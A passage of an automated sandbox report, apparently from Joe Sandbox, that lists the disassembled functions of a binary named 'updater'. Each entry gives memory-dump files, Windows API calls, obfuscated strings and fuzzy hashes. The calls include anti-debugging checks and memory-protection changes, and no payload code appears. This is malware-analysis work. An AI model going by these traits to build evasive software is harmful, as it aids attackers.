                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: H_prolog2___std_fs_copy_file@12
                                    • String ID:
                                    • API String ID: 1952593469-0
                                    • Opcode ID: 2ca224bd62a12594fcbb4fef358a29d57bc5e039242b6aa38988b2ac860f49b8
                                    • Instruction ID: a6ded08159911027bbc0ef0c62098bf680f4e2d4be896a6be987e176b36132a9
                                    • Opcode Fuzzy Hash: 2ca224bd62a12594fcbb4fef358a29d57bc5e039242b6aa38988b2ac860f49b8
                                    • Instruction Fuzzy Hash: F5E0D83172161163C225694D9C49A97B7BEBFC6A39B14022DEA1993680FF60A910C6F5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Deallocate
                                    • String ID:
                                    • API String ID: 1075933841-0
                                    • Opcode ID: 31dcf3dc1ad50d0894debbb5bd7d54a72b8730b25ea183235a8da2b72f515047
                                    • Instruction ID: 552decdfcd3e0d1b915b570ba527b0d5734bec9cbf40bc36d81288cf047f9301
                                    • Opcode Fuzzy Hash: 31dcf3dc1ad50d0894debbb5bd7d54a72b8730b25ea183235a8da2b72f515047
                                    • Instruction Fuzzy Hash: 83D012310146108BE3248F58F54574577E5EF44729F10091ED081C2560DB79AD448794
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Deallocate
                                    • String ID:
                                    • API String ID: 1075933841-0
                                    • Opcode ID: 5b52933b155fdb532d347984173775a0226bf495b6642164c653c436c958e7f8
                                    • Instruction ID: 0a53819d846762c1d7568e854bbc8e20632163320d71000cbcd59e7fd13f0dbc
                                    • Opcode Fuzzy Hash: 5b52933b155fdb532d347984173775a0226bf495b6642164c653c436c958e7f8
                                    • Instruction Fuzzy Hash: 11D05E320142018BF3346E18F0017627BE6EB00728F24091DE0D1C6591C7A95C888798
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateFileW.KERNEL32(00000000,00000000,?,0142C525,?,?,00000000), ref: 0142C152
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 34c883ff01ec69877c19532728b8879cfc3f2c84992c69e304ecb82233b98f55
                                    • Instruction ID: f3859b446557bcb4ff167f4e9ba5d41aa820fbd61b573fea6a9916305f428f68
                                    • Opcode Fuzzy Hash: 34c883ff01ec69877c19532728b8879cfc3f2c84992c69e304ecb82233b98f55
                                    • Instruction Fuzzy Hash: A9D06C7200010DBBDF128E84DD06EDA3FAAFB48714F014000BA5856020C732E821EB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _free.LIBCMT ref: 01415653
                                      • Part of subcall function 01420123: HeapFree.KERNEL32(00000000,00000000), ref: 01420139
                                      • Part of subcall function 01420123: GetLastError.KERNEL32(?,?,0141DA9C), ref: 0142014B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorFreeHeapLast_free
                                    • String ID:
                                    • API String ID: 1353095263-0
                                    • Opcode ID: 8a682b33a536c5502f97d1a5cabba1255ece08263c3092e6da3b829fddb3085a
                                    • Instruction ID: cadcd43b2ba6e1226c90d5f9eab847463992994c9ae8c1144b819e1e51be6077
                                    • Opcode Fuzzy Hash: 8a682b33a536c5502f97d1a5cabba1255ece08263c3092e6da3b829fddb3085a
                                    • Instruction Fuzzy Hash: DEC08C31000208BBCB009B42C806A4E7BA8DB80264F200048F41017250CAB2EF409680
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CloseHandle.KERNEL32(00000000), ref: 013B7BF7
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID:
                                    • API String ID: 2962429428-0
                                    • Opcode ID: d996261578099ae32535d197810cc30230624f94e899abbc18f9c1e12a9a4887
                                    • Instruction ID: af0928b39e6842aa040e952daf2ebdc34ff955fffe4153dc92293e9532850106
                                    • Opcode Fuzzy Hash: d996261578099ae32535d197810cc30230624f94e899abbc18f9c1e12a9a4887
                                    • Instruction Fuzzy Hash: EBF0F830504F408FE732CA38E048792BAE0AB44619F040A2E93B286DA0E730E486CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CloseHandle.KERNEL32(000000FF), ref: 013F5DA8
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID:
                                    • API String ID: 2962429428-0
                                    • Opcode ID: e929c7a616ffd28a28c43f620b157caf1892001914d69d0eb69886f1b4317940
                                    • Instruction ID: 5edb1513f8f98f38d607027609c4e65276835acad706b10ac08d7c1b913abea6
                                    • Opcode Fuzzy Hash: e929c7a616ffd28a28c43f620b157caf1892001914d69d0eb69886f1b4317940
                                    • Instruction Fuzzy Hash: B1C0127110660966D6305A5A980C5957A595B113657548229BB6C446F0DB31C4A6C550
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionDeallocateVariableWake
                                    • String ID: .$.$.$.$.$.$.$AMAB$AZAM$ZAMA$ZAMA$]YA\$]]YA$`OCK$~O]]$~\AZ
                                    • API String ID: 1208101283-2674794497
                                    • Opcode ID: de032d1679c076c1f96adb67c99496db917e6f8d0ea5134202896b84b0ad92c1
                                    • Instruction ID: d92f03d55ce51e85898f28993411274a97dd29c489fafe08fdd73158d050565d
                                    • Opcode Fuzzy Hash: de032d1679c076c1f96adb67c99496db917e6f8d0ea5134202896b84b0ad92c1
                                    • Instruction Fuzzy Hash: 75023871D00246CECB25EFE9C844BEEBB71AF21718F24415EE4596F2A2DBB05D89CB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: +Inf$-Inf$Inf$NaN
                                    • API String ID: 0-4067408017
                                    • Opcode ID: cd131b5fdd28d03d788f833782ae1b3fd5f5228e548fa0b3892292f565b08418
                                    • Instruction ID: f5fae88112860661f779f301980bf7390f2a9a4cccc4b2944b1fa6d5776b18f6
                                    • Opcode Fuzzy Hash: cd131b5fdd28d03d788f833782ae1b3fd5f5228e548fa0b3892292f565b08418
                                    • Instruction Fuzzy Hash: 2A62A272A1C7818FD72ACE3C945036BBBE5AFDA248F188A5EF4C997252D730C546C742
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: %z AS %s$%z ORDER BY$%z USING PRIMARY KEY$%z VIRTUAL TABLE INDEX %d:%s$%z WITH INDEX %s$:$L$TABLE %s
                                    • API String ID: 0-162927363
                                    • Opcode ID: 3191fb12a03202eb2c0c6512d30ba18a6a2feba77fb642894baabb6f64ad9161
                                    • Instruction ID: 9974d76616fea6d68a48e21ee69413a87cdc5f81e68073c1be1e9c302f275dbc
                                    • Opcode Fuzzy Hash: 3191fb12a03202eb2c0c6512d30ba18a6a2feba77fb642894baabb6f64ad9161
                                    • Instruction Fuzzy Hash: 72D22771608341DFD714DF28D840A2BBBE6BFC8718F14892DFA899B2A1D771D945CB82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0142049B: GetLastError.KERNEL32(?,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 014204A0
                                      • Part of subcall function 0142049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 0142053E
                                    • GetACP.KERNEL32(?,?,?,?,?,?,0141E6A8,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0142A9F3
                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0141E6A8,?,?,?,00000055,?,-00000050,?,?), ref: 0142AA1E
                                    • _wcschr.LIBVCRUNTIME ref: 0142AAB2
                                    • _wcschr.LIBVCRUNTIME ref: 0142AAC0
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0142AB81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                    • String ID: utf8
                                    • API String ID: 4147378913-905460609
                                    • Opcode ID: 76f8a0d3c98bde8ceed97ac62e5c5c03c526811f225e6cb79177f56d92184301
                                    • Instruction ID: 713217e4b8934b58f794543ea54f6751a403e29b81e215a223f4160b5c54381e
                                    • Opcode Fuzzy Hash: 76f8a0d3c98bde8ceed97ac62e5c5c03c526811f225e6cb79177f56d92184301
                                    • Instruction Fuzzy Hash: 47713D71600222AAEB25EB3ACC45F6777A9EF58700FA4482FEE05D76A0E770D5C5C760
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __floor_pentium4
                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                    • API String ID: 4168288129-2761157908
                                    • Opcode ID: 1708e8e73eb4ecf2fbea0cc2e04197903ab93854a7a9d2e3e01c459227224ad9
                                    • Instruction ID: d402178f0cc7682b0d0b23b1b5365b1047c444c34e44f8ae7fd78575d587b126
                                    • Opcode Fuzzy Hash: 1708e8e73eb4ecf2fbea0cc2e04197903ab93854a7a9d2e3e01c459227224ad9
                                    • Instruction Fuzzy Hash: 8DC24671E046288FDB25CE68DD407EAB7B5EB89314F9441EBD90EE7250E774AE818F40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLocaleInfoW.KERNEL32(?,2000000B,0142B3DC,00000002,00000000,?,?,?,0142B3DC,?,00000000), ref: 0142B157
                                    • GetLocaleInfoW.KERNEL32(?,20001004,0142B3DC,00000002,00000000,?,?,?,0142B3DC,?,00000000), ref: 0142B180
                                    • GetACP.KERNEL32(?,?,0142B3DC,?,00000000), ref: 0142B195
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID: ACP$OCP
                                    • API String ID: 2299586839-711371036
                                    • Opcode ID: 47b820022a0a95a2f431b8017602a117cb35a986b5ad35209e3452832ec24b46
                                    • Instruction ID: 790234937f1a48fe5a7da27c83dfdb8396bfddca4a0669c285a18fc34aea43ef
                                    • Opcode Fuzzy Hash: 47b820022a0a95a2f431b8017602a117cb35a986b5ad35209e3452832ec24b46
                                    • Instruction Fuzzy Hash: 3921CB72B00120A6EB358F58C801AB777A7EB44ED0BE68466E949C7335E732DEC1C350
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0142049B: GetLastError.KERNEL32(?,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 014204A0
                                      • Part of subcall function 0142049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 0142053E
                                      • Part of subcall function 0142049B: _free.LIBCMT ref: 014204FD
                                      • Part of subcall function 0142049B: _free.LIBCMT ref: 01420533
                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0142B39F
                                    • IsValidCodePage.KERNEL32(00000000), ref: 0142B3E8
                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0142B3F7
                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0142B43F
                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0142B45E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                    • String ID:
                                    • API String ID: 949163717-0
                                    • Opcode ID: c77b199e42575ef1207f7debfa67fb211421119d06df35a059b5a83e98112362
                                    • Instruction ID: d4283e174b32c081bdfdd46479f468e26e72860f97a3db34ea75d6828fcd494a
                                    • Opcode Fuzzy Hash: c77b199e42575ef1207f7debfa67fb211421119d06df35a059b5a83e98112362
                                    • Instruction Fuzzy Hash: E3519371A00226ABEB20DFA9CC40BBF77B8FF58700F94446AEE50E7260D7709584CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 01412527
                                    • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0141253B
                                    • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004,?,?,?,0000001C), ref: 0141258B
                                    • VirtualProtect.KERNEL32(?,-00000001,00000104,?,?,?,0000001C), ref: 014125A0
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocInfoProtectQuerySystem
                                    • String ID:
                                    • API String ID: 3562403962-0
                                    • Opcode ID: 098a1401e6f57bffb84311671c0368ca868923fcd587bfbdc142b30cb3d5c77f
                                    • Instruction ID: 4aea70192a02f17ca1c1726f511f97e99deeb3f0e4584693db87ede6cb1caba7
                                    • Opcode Fuzzy Hash: 098a1401e6f57bffb84311671c0368ca868923fcd587bfbdc142b30cb3d5c77f
                                    • Instruction Fuzzy Hash: 18219572E00119BBDF20DFA9CC95EEFBBB9EB44650B140426EA06F7258E6B4D904C790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 01413475
                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 0141347F
                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0141348C
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
                                    • Opcode ID: 5816975457fb3a1c5dc53ac05de1ea61a2cf44577b072f1cf2c384d8d6b758d4
                                    • Instruction ID: fc90d00a09ff6d75267b978bec507c9620cde1cc79a8453ee4977710db6ce3ab
                                    • Opcode Fuzzy Hash: 5816975457fb3a1c5dc53ac05de1ea61a2cf44577b072f1cf2c384d8d6b758d4
                                    • Instruction Fuzzy Hash: 9E31D87490121D9BCB62DF69D98878DBBB4BF18310F5045EAE41CA7260E7709B858F44
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Resource$LoadLockSizeof
                                    • String ID:
                                    • API String ID: 2853612939-0
                                    • Opcode ID: 841a25eabd639413a481f3c2176218ce6644b1d766ae25612734a32a74fdaee7
                                    • Instruction ID: a23ea71ab959f72d2fad638e6e72ee7b37108df745c5cec9d642b4a5412d5227
                                    • Opcode Fuzzy Hash: 841a25eabd639413a481f3c2176218ce6644b1d766ae25612734a32a74fdaee7
                                    • Instruction Fuzzy Hash: 3CF0FC7350112597DB310A5D9CCC8ABFBACDB8461A30D082AFE8FD7916FB70DC508694
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 13efcb69164dcbb8558fc26197092f320b08139c4161ff7fcae7fe7da06277c8
                                    • Instruction ID: fc1a61fe454b5b55375f9744c1b396f1129dbd313afe3c619b4e0ace3121859a
                                    • Opcode Fuzzy Hash: 13efcb69164dcbb8558fc26197092f320b08139c4161ff7fcae7fe7da06277c8
                                    • Instruction Fuzzy Hash: 2BF15071E012599FDF14CFA9C9806AEBBB1FF88314F25826AD919A7355D730AA01CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLocaleInfoEx.KERNEL32(?,?,0140D265,?,00000022,00000000,00000002,?,?,01402908,00000004,013FCD4E,?,00000004,013FE352,00000000), ref: 0140D5AC
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,?,?,?,0140D265,?,00000022,00000000,00000002,?,?,01402908,00000004,013FCD4E), ref: 0140D5B7
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID:
                                    • API String ID: 2299586839-0
                                    • Opcode ID: 5c1a0313922c4de1a1482bc73cf552ea9da88f508c5353b325e05ba981ab0878
                                    • Instruction ID: ec645b26c627c87fdba701feed180d7ae7fcd4aa0be64b715ef1880579c64d3d
                                    • Opcode Fuzzy Hash: 5c1a0313922c4de1a1482bc73cf552ea9da88f508c5353b325e05ba981ab0878
                                    • Instruction Fuzzy Hash: F3E0EC72905128EB8F136FDAEC088AE7F69EF046657044026FE05572B4DB7299609BD1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLastError.KERNEL32(00000000,?,?,00000000), ref: 013D3A09
                                    • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 013D3A17
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
